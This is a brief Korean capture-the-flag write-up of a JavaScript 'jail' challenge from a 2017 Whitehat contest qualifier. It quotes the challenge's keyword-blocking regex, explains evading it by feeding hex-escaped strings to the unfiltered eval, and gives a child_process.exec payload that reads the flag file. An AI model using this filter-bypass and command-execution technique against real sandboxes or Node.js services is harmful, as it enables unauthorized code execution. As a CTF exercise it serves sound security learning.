Whitehat contest 2017 PreQual - jail (235 pts.)

문제에 먼저 접속해서 hint를 알아보면 무엇을 필터링하는지 목록을 볼 수 있다.

1
2
3
4
5
Hello Java-Script Jail
type: hint, quit
> hint
(input) => (new RegExp(/with|\.|;|new| |'|child|crypto|os|http|dns|net|tr|
tty|zlib|punycode|util|url|ad|nc|>|`|\+|ex|=/i).test(input))

eval은 필터링 하지 않는다는것을 알아냈고 나머지 문자열의 필터링을 우회하기 위해서 “\x41”처럼

hex 아스키값으로 eval에 입력해서 사용하기로 했다.

source :

1
require('child_process').exec('cat flag', (error, stdout, stderr) => {console.log(stdout);});

flag : easy~esay!easy?_Jav4-scr1pt~yay

Share